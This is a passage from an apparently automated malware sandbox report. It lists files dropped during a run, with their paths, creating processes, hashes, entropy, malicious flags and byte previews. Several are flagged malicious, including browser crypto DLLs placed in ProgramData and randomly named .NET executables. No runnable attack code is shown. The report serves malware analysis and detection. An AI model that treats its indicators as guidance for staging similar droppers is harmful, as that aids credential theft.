                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):4751
                                                                                                                                                                                                                                          Entropy (8bit):4.471699572481577
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:48:cvIwWl8zs3tJg77aI91KWpW8VYd5Ym8M4JcghEO7FXE+q8vChEOt1Y7d7Jd:uIjf3HI7Tr7VgoJcgijKCik67d7Jd
                                                                                                                                                                                                                                          MD5:DD8717E4958C73659A196088671943D1
                                                                                                                                                                                                                                          SHA1:E4EA43167A5B536FB3EF77B9C16F9191F3C44D49
                                                                                                                                                                                                                                          SHA-256:AF1D6367917681BB46B1349A570E62F41179C00A6C107270D7301A85B8F40F66
                                                                                                                                                                                                                                          SHA-512:AD1067C67FC454A2802A78281DAC394065888496619A66FD785F611CB9B4A30D12734BAE7286920D668DD48D99864D3024879A82448FFAE9352AA748056BB7BA
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                          Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="525825" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                                                                                                                                                                                                                          C:\ProgramData\Microsoft\Windows\WER\Temp\WERF897.tmp.dmp

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                          File Type:Mini DuMP crash report, 15 streams, Wed Oct 2 12:42:56 2024, 0x1205a4 type
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):262823
                                                                                                                                                                                                                                          Entropy (8bit):3.8375543576070887
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:1536:cv15fhDtT7pt/h2JCDeM/Cs7t6XuBojR57pN4uE2aOUEQSVX2QM4kMLTgc9oAOq/:cvjb3L5E5T4uEqGyGQMwLTg99pujv
                                                                                                                                                                                                                                          MD5:7BF77FE1D52C4FD12F4AA12D830C6820
                                                                                                                                                                                                                                          SHA1:D3A96E8FF5A3C2D1902738893227AC418E73EE2E
                                                                                                                                                                                                                                          SHA-256:CCAA5AD595534A4025DD9D5DA76B54028C8703A2A82B6051A3406F758B7D7033
                                                                                                                                                                                                                                          SHA-512:CD0DDD47E77600C2DCCDE7FE74386C228372E4776E4956714B542CD4BB0FBC5DDDF815470EFF558E01EBCD9BD992C8702CC93838E2BCFBE8807A178AD6AE00D7
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                          Preview:MDMP..a..... ........?.f........................D...........$............'..zP..........`.......8...........T...........x.../........... ............ ..............................................................................eJ....... ......GenuineIntel............T............?.f............................. ..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                          C:\ProgramData\Microsoft\Windows\WER\Temp\WERF9F0.tmp.WERInternalMetadata.xml

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                          File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):8406
                                                                                                                                                                                                                                          Entropy (8bit):3.693509261726881
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:192:R6l7wVeJVK6F6Y2DiSU9MigmfZXfpr089baAsfjem:R6lXJY6F6Y/SU9MigmfpDaTfz
                                                                                                                                                                                                                                          MD5:8C18E30BBA9A46DC92602248C6F40255
                                                                                                                                                                                                                                          SHA1:7BC53FA8629E995B0268B1B4CAA3C34E2B773ABB
                                                                                                                                                                                                                                          SHA-256:954BD36C6BCEC3FB9695E1EC5F11B8BA411CBA1CD3BF9108BAF1D9CB9C09010B
                                                                                                                                                                                                                                          SHA-512:979E8689F940ACB644255F5E623FD81DF0C556BD8B02C87BCBDC0033949173C41F7107340C46457F45196C4B89916A6E31EEC6707A6A3CD32EF7490F2C62C194
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                          Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.4.0.1.6.<./.P.i.

                                                                                                                                                                                                                                          C:\ProgramData\Microsoft\Windows\WER\Temp\WERFA20.tmp.xml

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):4751
                                                                                                                                                                                                                                          Entropy (8bit):4.472044195016988
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:48:cvIwWl8zs3tJg77aI91KWpW8VYddPYm8M4JcghEO7Fz/+q8vChEOKH1Y7d7Fd:uIjf3HI7Tr7VgdSJcgig/KCi367d7Fd
                                                                                                                                                                                                                                          MD5:14044F842DDF29239BADF96C724308A4
                                                                                                                                                                                                                                          SHA1:530D8188C9E6B940D872CAA051E1306A8BEC02E6
                                                                                                                                                                                                                                          SHA-256:7817A290D69CFA1829E9B939797B4E2232859AC30D2A3510FAAF658D162BD4A6
                                                                                                                                                                                                                                          SHA-512:0ACF8521ECF626555770E37D7ED5736E5C858825D9BAD77EE67E845D0C998906BFBA08957269502739E275198656FDCC4F04D3C027AF1195F00AFC5ECEB29A54
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                          Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="525825" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                                                                                                                                                                                                                          C:\ProgramData\freebl3.dll

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):685392
                                                                                                                                                                                                                                          Entropy (8bit):6.872871740790978
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
                                                                                                                                                                                                                                          MD5:550686C0EE48C386DFCB40199BD076AC
                                                                                                                                                                                                                                          SHA1:EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
                                                                                                                                                                                                                                          SHA-256:EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
                                                                                                                                                                                                                                          SHA-512:0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                          Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........4......p.....................................................@A........................H...S...............x............F..P/.......#................................... ..................@............................text............................... ..`.rdata....... ......................@..@.data...<F...0......................@....00cfg..............................@..@.rsrc...x...........................@..@.reloc...#.......$..."..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                          C:\ProgramData\mozglue.dll

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):608080
                                                                                                                                                                                                                                          Entropy (8bit):6.833616094889818
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
                                                                                                                                                                                                                                          MD5:C8FD9BE83BC728CC04BEFFAFC2907FE9
                                                                                                                                                                                                                                          SHA1:95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
                                                                                                                                                                                                                                          SHA-256:BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
                                                                                                                                                                                                                                          SHA-512:FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                          Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........^......................................................j.....@A.........................`...W.....,.... ..................P/...0...A...S..............................h.......................Z.......................text...a........................... ..`.rdata..............................@..@.data...D...........................@....00cfg..............................@..@.tls................................@....rsrc........ ......................@..@.reloc...A...0...B..................@..B................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                          C:\ProgramData\msvcp140.dll

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):450024
                                                                                                                                                                                                                                          Entropy (8bit):6.673992339875127
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
                                                                                                                                                                                                                                          MD5:5FF1FCA37C466D6723EC67BE93B51442
                                                                                                                                                                                                                                          SHA1:34CC4E158092083B13D67D6D2BC9E57B798A303B
                                                                                                                                                                                                                                          SHA-256:5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
                                                                                                                                                                                                                                          SHA-512:4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L.....0].........."!.....(..........`........@......................................,.....@A.........................g.......r...........................A.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                          C:\ProgramData\nss3.dll

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):2046288
                                                                                                                                                                                                                                          Entropy (8bit):6.787733948558952
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
                                                                                                                                                                                                                                          MD5:1CC453CDF74F31E4D913FF9C10ACDDE2
                                                                                                                                                                                                                                          SHA1:6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
                                                                                                                                                                                                                                          SHA-256:AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
                                                                                                                                                                                                                                          SHA-512:DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                          Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................`........................................p......l- ...@A.........................&..........@....P..x...............P/...`..\...................................................|...\....&..@....................text............................... ..`.rdata..l...........................@..@.data...DR..........................@....00cfg.......@......................@..@.rsrc...x....P......................@..@.reloc..\....`......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                          C:\ProgramData\softokn3.dll

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):257872
                                                                                                                                                                                                                                          Entropy (8bit):6.727482641240852
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
                                                                                                                                                                                                                                          MD5:4E52D739C324DB8225BD9AB2695F262F
                                                                                                                                                                                                                                          SHA1:71C3DA43DC5A0D2A1941E874A6D015A071783889
                                                                                                                                                                                                                                          SHA-256:74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
                                                                                                                                                                                                                                          SHA-512:2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                          Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................P...............................................Sg....@A........................Dv..S....w..........................P/.......5..8q...............................................{...............................text...&........................... ..`.rdata.............................@..@.data................|..............@....00cfg..............................@..@.rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                          C:\ProgramData\vcruntime140.dll

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):80880
                                                                                                                                                                                                                                          Entropy (8bit):6.920480786566406
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
                                                                                                                                                                                                                                          MD5:A37EE36B536409056A86F50E67777DD7
                                                                                                                                                                                                                                          SHA1:1CAFA159292AA736FC595FC04E16325B27CD6750
                                                                                                                                                                                                                                          SHA-256:8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
                                                                                                                                                                                                                                          SHA-512:3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L...|.0].........."!.........................................................0.......m....@A.............................................................A... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                          C:\Users\userCGHCGIIDGD.exe

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                          File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):423840
                                                                                                                                                                                                                                          Entropy (8bit):7.988954975057422
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:12288:hQq9JI/vWhNOAE2wMUZ0iR4HHW02AEPzYhDU9qcEO:5JXfOATt3202AHhD5ct
                                                                                                                                                                                                                                          MD5:237AF39F8B579AAD0205F6174BB96239
                                                                                                                                                                                                                                          SHA1:7AAD40783BE4F593A2883B6A66F66F5F624D4550
                                                                                                                                                                                                                                          SHA-256:836CE1411F26919F8FB95548D03C2F4DFD658FC525DFE21C7BE8ED65F81A5957
                                                                                                                                                                                                                                          SHA-512:DF46993A2029B22CBC88B289398265494C5A8F54EA803E15B7B12F4A7BC98152DF298916D341E3C3590329B35A806788AE294BAE2E6832F2A2AC426D0145504D
                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 61%
                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...0..f................. ...........>... ...@....@.. ....................................`..................................>..S....@..B...........xQ..(&...`......`=............................................... ............... ..H............text........ ... .................. ..`.rsrc...B....@......."..............@..@.reloc.......`.......&..............@..B.................>......H.......@+.. ............................................................B,..Je.8..*.......Xf..3..Zm...v.$:...r......X...M..6'4..,.O.T...!..B..C.|....[.{2.y.d?1d2.m.......U5A9.3.B.[l.t..P3f.A*.y.z$.[Yi.............[..v..\..Bq..g.^.....pd....{....t.}.y*..[P....v.y.H. ..@.'2.^..4.h..7!.O.w.Jx...i....v...?.G.6^...`.q8..NZ..-.T...u...W1z.....K.._...*..7.-...H.<fz(..7..-..@.{.%.x.B.#.."...S4.,N.........iO......#T......jN.F.A......h.j..p..."&.xU-...`....4....

                                                                                                                                                                                                                                          C:\Users\userJEHDHIEGII.exe

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                          File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):391072
                                                                                                                                                                                                                                          Entropy (8bit):7.987128579531616
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:6144:7RNcX3Y/L03IZz1t0oQqXl8uRa2rIfpympCmd75n3L2BdEtD+gEO:7RNcXoIYZz1t0IDr2y9md75bAy1rEO
                                                                                                                                                                                                                                          MD5:C7E7CFC3ED17AEF6C67C265389593EE3
                                                                                                                                                                                                                                          SHA1:44AAEA45A59F194F33FF435A430FCBD9E7434AD5
                                                                                                                                                                                                                                          SHA-256:0DDEBB36BEB37631DF17F68A14C90519F93BA7C200C62003527273119442E1FF
                                                                                                                                                                                                                                          SHA-512:6C5F7A6626AAC4B583D1165C4EA3BC69E315CDCE94D3E1D3442DC9643E0983F2A80E0495BAC79D4AA0E4DB309F0AAB373D917E6AF12FFAAD333ABA21E16249D2
                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 61%
                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L... ..f................................ ........@.. ..............................."....`.....................................S.......B...........x...(&..........`................................................ ............... ..H............text........ ...................... ..`.rsrc...B...........................@..@.reloc..............................@..B.......................H.......@... ..............................................................[(<.sT.w/.....x~I......T..T5Q>.z..*...b.S./....2E.w.>../.d..t_.s........o>...............UV.S.....a5..JK....Y.w......#....s."....-d..-7..av..n.\....]............L...t...:2o1.!.....*..q9_O......K.^...."...)0...3..$.5.,..}.....3cx.z.....2I}.......I.e...$. .....V ..OG...Ua.$+...%\.B-.U...3....nc...,..lf...f.o..`. bO.c2...R..]0o.f....<.9..^n\.....\..2....=.nk..7 .,o.8.#.b...*.T..g}qB.[

                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\E4aR4O9hOTF5WJfvKNpcVCp8.exe.log

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Users\user\Documents\iofolko5\E4aR4O9hOTF5WJfvKNpcVCp8.exe
                                                                                                                                                                                                                                          File Type:CSV text
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):425
                                                                                                                                                                                                                                          Entropy (8bit):5.353683843266035
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:12:Q3La/KDLI4MWuPTAOKbbDLI4MWuPJKAVKhav:ML9E4KlKDE4KhKiKhk
                                                                                                                                                                                                                                          MD5:859802284B12C59DDBB85B0AC64C08F0
                                                                                                                                                                                                                                          SHA1:4FDDEFC6DB9645057FEB3322BE98EF10D6A593EE
                                                                                                                                                                                                                                          SHA-256:FB234B6DAB715ADABB23E450DADCDBCDDFF78A054BAF19B5CE7A9B4206B7492B
                                                                                                                                                                                                                                          SHA-512:8A371F671B962AE8AE0F58421A13E80F645FF0A9888462C1529B77289098A0EA4D6A9E2E07ABD4F96460FCC32AA87B0581CA4D747E77E69C3620BF1368BA9A67
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..

                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\EBAEBFIIEC.exe.log

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\ProgramData\EBAEBFIIEC.exe
                                                                                                                                                                                                                                          File Type:CSV text
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):425
                                                                                                                                                                                                                                          Entropy (8bit):5.353683843266035
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:12:Q3La/KDLI4MWuPTAOKbbDLI4MWuPJKAVKhav:ML9E4KlKDE4KhKiKhk
                                                                                                                                                                                                                                          MD5:859802284B12C59DDBB85B0AC64C08F0
                                                                                                                                                                                                                                          SHA1:4FDDEFC6DB9645057FEB3322BE98EF10D6A593EE
                                                                                                                                                                                                                                          SHA-256:FB234B6DAB715ADABB23E450DADCDBCDDFF78A054BAF19B5CE7A9B4206B7492B
                                                                                                                                                                                                                                          SHA-512:8A371F671B962AE8AE0F58421A13E80F645FF0A9888462C1529B77289098A0EA4D6A9E2E07ABD4F96460FCC32AA87B0581CA4D747E77E69C3620BF1368BA9A67
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..

                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\FIEHIIIJDA.exe.log

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\ProgramData\FIEHIIIJDA.exe
                                                                                                                                                                                                                                          File Type:CSV text
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):425
                                                                                                                                                                                                                                          Entropy (8bit):5.353683843266035
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:12:Q3La/KDLI4MWuPTAOKbbDLI4MWuPJKAVKhav:ML9E4KlKDE4KhKiKhk
                                                                                                                                                                                                                                          MD5:859802284B12C59DDBB85B0AC64C08F0
                                                                                                                                                                                                                                          SHA1:4FDDEFC6DB9645057FEB3322BE98EF10D6A593EE
                                                                                                                                                                                                                                          SHA-256:FB234B6DAB715ADABB23E450DADCDBCDDFF78A054BAF19B5CE7A9B4206B7492B
